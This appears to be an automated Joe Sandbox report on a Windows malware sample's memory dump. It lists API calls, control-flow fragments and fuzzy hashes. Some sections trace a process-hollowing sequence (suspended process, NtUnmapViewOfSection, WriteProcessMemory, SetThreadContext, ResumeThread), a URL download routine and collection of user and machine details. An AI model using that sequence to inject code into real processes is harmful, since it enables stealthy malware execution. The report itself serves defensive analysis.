                                                control_flow_graph 510 def27a-def286 511 def2b8-def2c3 call decf30 510->511 512 def288-def28a 510->512 520 def2c5-def2c7 511->520 513 def28c-def28d 512->513 514 def2a3-def2b4 RtlAllocateHeap 512->514 513->514 516 def28f-def296 call dee411 514->516 517 def2b6 514->517 516->511 522 def298-def2a1 call ded487 516->522 517->520 522->511 522->514
                                                APIs
                                                • RtlAllocateHeap.NTDLL(00000000,?,?,?,00DE99B3,?,?,?,?,?,00DD20F3,?,?), ref: 00DEF2AC
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.418854109.0000000000DD1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00DD0000, based on PE: true
                                                • Associated: 0000000E.00000002.418827104.0000000000DD0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 0000000E.00000002.419055103.0000000000E00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 0000000E.00000002.419093395.0000000000E0A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 0000000E.00000002.419119044.0000000000E0F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_dd0000_9545.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: AllocateHeap
                                                • String ID:
                                                • API String ID: 1279760036-0
                                                • Opcode ID: 4612c4ad64e1aa7cf90155dcab1444106923f2a14a9e05b13b2ecdd520c9f328
                                                • Instruction ID: a7f2b99eab40cbcb14442c3e24f3571d8676c55c0d1a45482366b59c62aecd70
                                                • Opcode Fuzzy Hash: 4612c4ad64e1aa7cf90155dcab1444106923f2a14a9e05b13b2ecdd520c9f328
                                                • Instruction Fuzzy Hash: D2E0ED3B201AE16EEA2137678C01B9B3759DF123A5F284231FE58E21C0CB21CC0281B9
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 584 df3aa6-df3aca CreateFileW
                                                APIs
                                                • CreateFileW.KERNELBASE(00000000,00000000,?,00DF3E96,?,?,00000000,?,00DF3E96,00000000,0000000C), ref: 00DF3AC3
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.418854109.0000000000DD1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00DD0000, based on PE: true
                                                • Associated: 0000000E.00000002.418827104.0000000000DD0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 0000000E.00000002.419055103.0000000000E00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 0000000E.00000002.419093395.0000000000E0A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 0000000E.00000002.419119044.0000000000E0F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_dd0000_9545.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CreateFile
                                                • String ID:
                                                • API String ID: 823142352-0
                                                • Opcode ID: 05537d24a7b65011ec94bf358e20db9f496f05481bc83c3818056d45d5853a21
                                                • Instruction ID: 0a5ee150a786384f7160a6be7c733bc73108c18f659dcf6d99b5afce4ce42f8c
                                                • Opcode Fuzzy Hash: 05537d24a7b65011ec94bf358e20db9f496f05481bc83c3818056d45d5853a21
                                                • Instruction Fuzzy Hash: 79D06C3200010DBFDF028F85DC06EDA3BAAFB48714F014000BA5866020C732E861AB90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00DD4096
                                                • CreateProcessA.KERNEL32(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 00DD40FB
                                                • VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 00DD4114
                                                • GetThreadContext.KERNEL32(?,00000000), ref: 00DD412F
                                                • ReadProcessMemory.KERNEL32(?, ,?,00000004,00000000), ref: 00DD4153
                                                • GetModuleHandleA.KERNEL32(ntdll.dll,NtUnmapViewOfSection), ref: 00DD416E
                                                • GetProcAddress.KERNEL32(00000000), ref: 00DD4175
                                                • VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040), ref: 00DD419D
                                                • WriteProcessMemory.KERNEL32(?,00000000,?,?,00000000), ref: 00DD41BE
                                                • WriteProcessMemory.KERNEL32(?,?,?,?,00000000,?,?,00000000), ref: 00DD4202
                                                • WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000,?,?,00000000), ref: 00DD423E
                                                • SetThreadContext.KERNEL32(?,00000000,?,?,00000000), ref: 00DD425A
                                                • ResumeThread.KERNEL32(?,?,?,00000000), ref: 00DD4266
                                                • VirtualFree.KERNEL32(?,00000000,00008000,?,?,00000000), ref: 00DD4274
                                                • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00DD4295
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.418854109.0000000000DD1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00DD0000, based on PE: true
                                                • Associated: 0000000E.00000002.418827104.0000000000DD0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 0000000E.00000002.419055103.0000000000E00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 0000000E.00000002.419093395.0000000000E0A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 0000000E.00000002.419119044.0000000000E0F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_dd0000_9545.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Process$MemoryVirtual$ThreadWrite$AllocContextFreeModule$AddressCreateFileHandleNameProcReadResume
                                                • String ID: $NtUnmapViewOfSection$ntdll.dll
                                                • API String ID: 4033543172-1522589568
                                                • Opcode ID: 506fa91b72b6de75e619cbb3860b96ba0d89af87526b4f3e11c37b0695252b61
                                                • Instruction ID: 76614f4c4fe4083d7e9942c57fd1e2418dab4ef5610b1bcdbc3872bba9ad2e1b
                                                • Opcode Fuzzy Hash: 506fa91b72b6de75e619cbb3860b96ba0d89af87526b4f3e11c37b0695252b61
                                                • Instruction Fuzzy Hash: D2519F71A40218EFDB619F55DC45FEABBB8FF08701F1001A5F648AA2D0D7B2A994CF64
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • InternetOpenW.WININET(00E05EF4,00000000,00000000,00000000,00000000), ref: 00DD438C
                                                • InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 00DD439E
                                                • InternetReadFile.WININET(00000000,?,03E80000,03E80000), ref: 00DD43B1
                                                • InternetCloseHandle.WININET(00000000), ref: 00DD43C2
                                                • InternetCloseHandle.WININET(00000000), ref: 00DD43C5
                                                • InternetCloseHandle.WININET(00000000), ref: 00DD43D3
                                                • InternetCloseHandle.WININET(00000000), ref: 00DD43D6
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.418854109.0000000000DD1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00DD0000, based on PE: true
                                                • Associated: 0000000E.00000002.418827104.0000000000DD0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 0000000E.00000002.419055103.0000000000E00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 0000000E.00000002.419093395.0000000000E0A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 0000000E.00000002.419119044.0000000000E0F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_dd0000_9545.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Internet$CloseHandle$Open$FileRead
                                                • String ID: +S$runas
                                                • API String ID: 4294395943-2207193102
                                                • Opcode ID: 95e727908c2b72fb7a3a5cb991f554488f8e8754431700b3d59de587fd9dbe2b
                                                • Instruction ID: a71e45766cb6683a40a92953169d0ddfca7a75f86d17d617692179b2abfadbd8
                                                • Opcode Fuzzy Hash: 95e727908c2b72fb7a3a5cb991f554488f8e8754431700b3d59de587fd9dbe2b
                                                • Instruction Fuzzy Hash: EC51DE31E40248AFDB14DFA9CC85BEEBBB5EF48700F20811AE515B7291DB75A944CBB0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                  • Part of subcall function 00DD4D90: GetVersionExW.KERNEL32(0000011C,5CAF3EEB), ref: 00DD4E0A
                                                  • Part of subcall function 00DD4D90: GetModuleHandleA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00DD4E6B
                                                  • Part of subcall function 00DD4D90: GetProcAddress.KERNEL32(00000000), ref: 00DD4E72
                                                  • Part of subcall function 00DD5530: GetVersionExW.KERNEL32(0000011C,?,5CAF3EEB,00000000), ref: 00DD55A9
                                                • IsUserAnAdmin.SHELL32 ref: 00DE406D
                                                  • Part of subcall function 00DD2DA0: RegOpenKeyExA.ADVAPI32(?,?,00000000,00000001,5CAF3EEB,5CAF3EEB), ref: 00DD2F4C
                                                  • Part of subcall function 00DD2DA0: RegQueryValueExA.ADVAPI32(5CAF3EEB,?,00000000,00000000,?,00000400,?,?,00000000,00000001,5CAF3EEB,5CAF3EEB), ref: 00DD2F7A
                                                  • Part of subcall function 00DD2DA0: RegCloseKey.ADVAPI32(5CAF3EEB,?,?,00000000,00000001,5CAF3EEB,5CAF3EEB), ref: 00DD2F86
                                                • GetUserNameA.ADVAPI32(?,?), ref: 00DE4117
                                                • GetComputerNameExW.KERNEL32(00000002,?,?,?,?), ref: 00DE4180
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.418854109.0000000000DD1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00DD0000, based on PE: true
                                                • Associated: 0000000E.00000002.418827104.0000000000DD0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 0000000E.00000002.419055103.0000000000E00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 0000000E.00000002.419093395.0000000000E0A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 0000000E.00000002.419119044.0000000000E0F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_dd0000_9545.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: NameUserVersion$AddressAdminCloseComputerHandleModuleOpenProcQueryValue
                                                • String ID: .
                                                • API String ID: 2907018757-248832578
                                                • Opcode ID: 8e213fb0456b52c10a590bc5771b92072a7249a64a3304bc7378856cd4201bb8
                                                • Instruction ID: c3ea1c6b19470a5f60cb97048479ccafd3e506eff8d7220db0db5ee17d13583d
                                                • Opcode Fuzzy Hash: 8e213fb0456b52c10a590bc5771b92072a7249a64a3304bc7378856cd4201bb8
                                                • Instruction Fuzzy Hash: 34727270D042988BEF65EB28DC497DEBBB6AB51308F5441D8D40927286DB751FC8CFA2
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.418854109.0000000000DD1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00DD0000, based on PE: true
                                                • Associated: 0000000E.00000002.418827104.0000000000DD0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 0000000E.00000002.419055103.0000000000E00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 0000000E.00000002.419093395.0000000000E0A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 0000000E.00000002.419119044.0000000000E0F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_dd0000_9545.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: _free$InformationTimeZone
                                                • String ID:
                                                • API String ID: 597776487-0
                                                • Opcode ID: 57b2f2704be5e0b076401042296e3e31aac648195abd9451e686b18332e4cd6f
                                                • Instruction ID: 5ec4736fbbc726ad866a71738790769573ec4d560d8e1e9c298ad58fae8ca700
                                                • Opcode Fuzzy Hash: 57b2f2704be5e0b076401042296e3e31aac648195abd9451e686b18332e4cd6f
                                                • Instruction Fuzzy Hash: 75C14B7190064DAFDB20AF69EC41ABA7BB9DF01310F2AC159E795D7286E7318E41CB70
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • GetVersionExW.KERNEL32(0000011C,5CAF3EEB), ref: 00DD4E0A
                                                • GetModuleHandleA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00DD4E6B
                                                • GetProcAddress.KERNEL32(00000000), ref: 00DD4E72
                                                • GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00DD4F37
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.418854109.0000000000DD1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00DD0000, based on PE: true
                                                • Associated: 0000000E.00000002.418827104.0000000000DD0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 0000000E.00000002.419055103.0000000000E00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 0000000E.00000002.419093395.0000000000E0A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 0000000E.00000002.419119044.0000000000E0F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_dd0000_9545.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: AddressHandleInfoModuleProcSystemVersion
                                                • String ID:
                                                • API String ID: 1456109104-0
                                                • Opcode ID: 36ec79601426ecb64e08239e88f4b612c7e77bdb2647c362c4cadaebcc00e0d7
                                                • Instruction ID: e0fbbb47306e58679e9f88583a317de3947f141f28de388404094660df75e6f4
                                                • Opcode Fuzzy Hash: 36ec79601426ecb64e08239e88f4b612c7e77bdb2647c362c4cadaebcc00e0d7
                                                • Instruction Fuzzy Hash: BC122B30A002549FEB28EB28EC467AD7772EB95310F54419DE415AB3D6DB358EC48BF2
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • GetUserNameW.ADVAPI32(00000000,?), ref: 00DD3952
                                                • GetProcessHeap.KERNEL32(00000008,?), ref: 00DD3967
                                                • HeapAlloc.KERNEL32(00000000), ref: 00DD396A
                                                • GetUserNameW.ADVAPI32(00000000,?), ref: 00DD3978
                                                • LookupAccountNameW.ADVAPI32(00000000,?,00000000,?,00000000,?,?), ref: 00DD399B
                                                • GetProcessHeap.KERNEL32(00000008,?), ref: 00DD39A6
                                                • HeapAlloc.KERNEL32(00000000), ref: 00DD39A9
                                                • GetProcessHeap.KERNEL32(00000008,?), ref: 00DD39B9
                                                • HeapAlloc.KERNEL32(00000000), ref: 00DD39BC
                                                • LookupAccountNameW.ADVAPI32(00000000,?,00000000,?,00000000,?,?), ref: 00DD39E6
                                                • ConvertSidToStringSidW.ADVAPI32(00000000,00000000), ref: 00DD39F9
                                                • GetProcessHeap.KERNEL32(00000000,?), ref: 00DD3AF5
                                                • HeapFree.KERNEL32(00000000), ref: 00DD3AFE
                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00DD3B03
                                                • HeapFree.KERNEL32(00000000), ref: 00DD3B06
                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00DD3B0D
                                                • HeapFree.KERNEL32(00000000), ref: 00DD3B10
                                                • LocalFree.KERNEL32(00000000), ref: 00DD3B15
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.418854109.0000000000DD1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00DD0000, based on PE: true
                                                • Associated: 0000000E.00000002.418827104.0000000000DD0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 0000000E.00000002.419055103.0000000000E00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 0000000E.00000002.419093395.0000000000E0A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 0000000E.00000002.419119044.0000000000E0F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_dd0000_9545.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Heap$Process$FreeName$Alloc$AccountLookupUser$ConvertLocalString
                                                • String ID:
                                                • API String ID: 3326663573-0
                                                • Opcode ID: 5825a44da4c8e3dc82d63f02671c3de2ce3b978d8e7b22c2b6720b4623f2ab70
                                                • Instruction ID: e8284a42ba6ed1a592354e1b52eee15c4d240971646f1a48e8970a6362b4e3b0
                                                • Opcode Fuzzy Hash: 5825a44da4c8e3dc82d63f02671c3de2ce3b978d8e7b22c2b6720b4623f2ab70
                                                • Instruction Fuzzy Hash: C97190B1E00259AFDB14DFA5DC85FAFBBB8EF48300F04452AE905A7240DB359949CBB1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • ___free_lconv_mon.LIBCMT ref: 00DF2E43
                                                  • Part of subcall function 00DF29DC: _free.LIBCMT ref: 00DF29F9
                                                  • Part of subcall function 00DF29DC: _free.LIBCMT ref: 00DF2A0B
                                                  • Part of subcall function 00DF29DC: _free.LIBCMT ref: 00DF2A1D
                                                  • Part of subcall function 00DF29DC: _free.LIBCMT ref: 00DF2A2F
                                                  • Part of subcall function 00DF29DC: _free.LIBCMT ref: 00DF2A41
                                                  • Part of subcall function 00DF29DC: _free.LIBCMT ref: 00DF2A53
                                                  • Part of subcall function 00DF29DC: _free.LIBCMT ref: 00DF2A65
                                                  • Part of subcall function 00DF29DC: _free.LIBCMT ref: 00DF2A77
                                                  • Part of subcall function 00DF29DC: _free.LIBCMT ref: 00DF2A89
                                                  • Part of subcall function 00DF29DC: _free.LIBCMT ref: 00DF2A9B
                                                  • Part of subcall function 00DF29DC: _free.LIBCMT ref: 00DF2AAD
                                                  • Part of subcall function 00DF29DC: _free.LIBCMT ref: 00DF2ABF
                                                  • Part of subcall function 00DF29DC: _free.LIBCMT ref: 00DF2AD1
                                                • _free.LIBCMT ref: 00DF2E38
                                                  • Part of subcall function 00DEED91: HeapFree.KERNEL32(00000000,00000000,?,00DF2B6D,?,00000000,?,?,?,00DF2B94,?,00000007,?,?,00DF2F96,?), ref: 00DEEDA7
                                                  • Part of subcall function 00DEED91: GetLastError.KERNEL32(?,?,00DF2B6D,?,00000000,?,?,?,00DF2B94,?,00000007,?,?,00DF2F96,?,?), ref: 00DEEDB9
                                                • _free.LIBCMT ref: 00DF2E5A
                                                • _free.LIBCMT ref: 00DF2E6F
                                                • _free.LIBCMT ref: 00DF2E7A
                                                • _free.LIBCMT ref: 00DF2E9C
                                                • _free.LIBCMT ref: 00DF2EAF
                                                • _free.LIBCMT ref: 00DF2EBD
                                                • _free.LIBCMT ref: 00DF2EC8
                                                • _free.LIBCMT ref: 00DF2F00
                                                • _free.LIBCMT ref: 00DF2F07
                                                • _free.LIBCMT ref: 00DF2F24
                                                • _free.LIBCMT ref: 00DF2F3C
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.418854109.0000000000DD1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00DD0000, based on PE: true
                                                • Associated: 0000000E.00000002.418827104.0000000000DD0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 0000000E.00000002.419055103.0000000000E00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 0000000E.00000002.419093395.0000000000E0A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 0000000E.00000002.419119044.0000000000E0F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_dd0000_9545.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                • String ID:
                                                • API String ID: 161543041-0
                                                • Opcode ID: 25aeafbe7c0daaa3e1ff0f07f52cf52427664947afc6b76e49e003948fd98224
                                                • Instruction ID: fbbcd1a562e4e75c899a02600eba0ea675520efd8a59fca2f6186f9b36a0258f
                                                • Opcode Fuzzy Hash: 25aeafbe7c0daaa3e1ff0f07f52cf52427664947afc6b76e49e003948fd98224
                                                • Instruction Fuzzy Hash: 06312D716007099FEB21AA7ADC45B7677E9EF00310F2A8429F599DB191DBB1ED80CB30
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • IsInExceptionSpec.LIBVCRUNTIME ref: 00DEA402
                                                • type_info::operator==.LIBVCRUNTIME ref: 00DEA429
                                                • ___TypeMatch.LIBVCRUNTIME ref: 00DEA535
                                                • CatchIt.LIBVCRUNTIME ref: 00DEA58A
                                                • IsInExceptionSpec.LIBVCRUNTIME ref: 00DEA610
                                                • _UnwindNestedFrames.LIBCMT ref: 00DEA697
                                                • CallUnexpected.LIBVCRUNTIME ref: 00DEA6B2
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.418854109.0000000000DD1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00DD0000, based on PE: true
                                                • Associated: 0000000E.00000002.418827104.0000000000DD0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 0000000E.00000002.419055103.0000000000E00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 0000000E.00000002.419093395.0000000000E0A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 0000000E.00000002.419119044.0000000000E0F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_dd0000_9545.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ExceptionSpec$CallCatchFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                                • String ID: csm$csm$csm
                                                • API String ID: 4234981820-393685449
                                                • Opcode ID: c2f5c13a4261ec617e89a2d571903942d991ed9fb2b6803280416d032d952e77
                                                • Instruction ID: 85ae3841d752b5eefa0617fa4350b0f1c5e3b1f4bbf9e625c05d6bfa33822e3a
                                                • Opcode Fuzzy Hash: c2f5c13a4261ec617e89a2d571903942d991ed9fb2b6803280416d032d952e77
                                                • Instruction Fuzzy Hash: 12C17C7190028ADFCF15EF9AC8819AEBBB5FF14310F08415AE8156B252D331EA51CFB2
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • _free.LIBCMT ref: 00DEF580
                                                  • Part of subcall function 00DEED91: HeapFree.KERNEL32(00000000,00000000,?,00DF2B6D,?,00000000,?,?,?,00DF2B94,?,00000007,?,?,00DF2F96,?), ref: 00DEEDA7
                                                  • Part of subcall function 00DEED91: GetLastError.KERNEL32(?,?,00DF2B6D,?,00000000,?,?,?,00DF2B94,?,00000007,?,?,00DF2F96,?,?), ref: 00DEEDB9
                                                • _free.LIBCMT ref: 00DEF58C
                                                • _free.LIBCMT ref: 00DEF597
                                                • _free.LIBCMT ref: 00DEF5A2
                                                • _free.LIBCMT ref: 00DEF5AD
                                                • _free.LIBCMT ref: 00DEF5B8
                                                • _free.LIBCMT ref: 00DEF5C3
                                                • _free.LIBCMT ref: 00DEF5CE
                                                • _free.LIBCMT ref: 00DEF5D9
                                                • _free.LIBCMT ref: 00DEF5E7
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.418854109.0000000000DD1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00DD0000, based on PE: true
                                                • Associated: 0000000E.00000002.418827104.0000000000DD0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 0000000E.00000002.419055103.0000000000E00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 0000000E.00000002.419093395.0000000000E0A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 0000000E.00000002.419119044.0000000000E0F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_dd0000_9545.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: _free$ErrorFreeHeapLast
                                                • String ID:
                                                • API String ID: 776569668-0
                                                • Opcode ID: 9ad12f002b05e6d3c9c9f04e3e3cf79b77545341c25399bf0a5a8725b50c96b7
                                                • Instruction ID: e3ce65ac20e75fa91aafe97fa4b6445ede6d517ec982e3a6983ba3dced4b55a7
                                                • Opcode Fuzzy Hash: 9ad12f002b05e6d3c9c9f04e3e3cf79b77545341c25399bf0a5a8725b50c96b7
                                                • Instruction Fuzzy Hash: 52219676900148BFCB41EFA5CC81DDE7FB9EF08340B0145A6F9599B121EB72EA44CBA0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.418854109.0000000000DD1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00DD0000, based on PE: true
                                                • Associated: 0000000E.00000002.418827104.0000000000DD0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 0000000E.00000002.419055103.0000000000E00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 0000000E.00000002.419093395.0000000000E0A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 0000000E.00000002.419119044.0000000000E0F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_dd0000_9545.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 30c348abd49b7b36d47620cec35e5cebbdd4dd0fcae695ebc9ce0576e66e528f
                                                • Instruction ID: 361963a6a5c500fc00a0a552947aa2b1b1f920cb6b47043adf5820db15f614b2
                                                • Opcode Fuzzy Hash: 30c348abd49b7b36d47620cec35e5cebbdd4dd0fcae695ebc9ce0576e66e528f
                                                • Instruction Fuzzy Hash: 6EC1CE70A1824DAFDB11DFA9DC80BFD7BB1EF09300F1A8159E654AB292CB719945CB70
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.418854109.0000000000DD1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00DD0000, based on PE: true
                                                • Associated: 0000000E.00000002.418827104.0000000000DD0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 0000000E.00000002.419055103.0000000000E00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 0000000E.00000002.419093395.0000000000E0A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 0000000E.00000002.419119044.0000000000E0F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_dd0000_9545.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: _free$___from_strstr_to_strchr
                                                • String ID:
                                                • API String ID: 3409252457-0
                                                • Opcode ID: 39bfb7aa563452302a04894112b51d72958fbc20b7f14206e0becf6b9dfe7baa
                                                • Instruction ID: 18006124bae84f99e34fc95780b9d57a5f23f1509bdc5a74d5cb94c8e253aab8
                                                • Opcode Fuzzy Hash: 39bfb7aa563452302a04894112b51d72958fbc20b7f14206e0becf6b9dfe7baa
                                                • Instruction Fuzzy Hash: B751087190434DAFDB10AFB99C81A7D7BA4EF11310F1AC16EEA5497181EF758A81CB70
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • _ValidateLocalCookies.LIBCMT ref: 00DE9CE7
                                                • ___except_validate_context_record.LIBVCRUNTIME ref: 00DE9CEF
                                                • _ValidateLocalCookies.LIBCMT ref: 00DE9D78
                                                • __IsNonwritableInCurrentImage.LIBCMT ref: 00DE9DA3
                                                • _ValidateLocalCookies.LIBCMT ref: 00DE9DF8
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.418854109.0000000000DD1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00DD0000, based on PE: true
                                                • Associated: 0000000E.00000002.418827104.0000000000DD0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 0000000E.00000002.419055103.0000000000E00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 0000000E.00000002.419093395.0000000000E0A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 0000000E.00000002.419119044.0000000000E0F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_dd0000_9545.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                • String ID: csm
                                                • API String ID: 1170836740-1018135373
                                                • Opcode ID: 300ee42fbcecdefb32a74e7ec7231c0a75c40ff84580fec362eed963343b817c
                                                • Instruction ID: 4c9a20adbddaa79c4f59af2176abcdc042b8bd6915d068cd80063920bfafd801
                                                • Opcode Fuzzy Hash: 300ee42fbcecdefb32a74e7ec7231c0a75c40ff84580fec362eed963343b817c
                                                • Instruction Fuzzy Hash: 7A41E434A01259AFCF10EF6ACC91A9EBBB1EF45324F188055E8146B392D731EA45CFB1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.418854109.0000000000DD1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00DD0000, based on PE: true
                                                • Associated: 0000000E.00000002.418827104.0000000000DD0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 0000000E.00000002.419055103.0000000000E00000.00000002.00000001.01000000.0000000A.sdmpDownload File
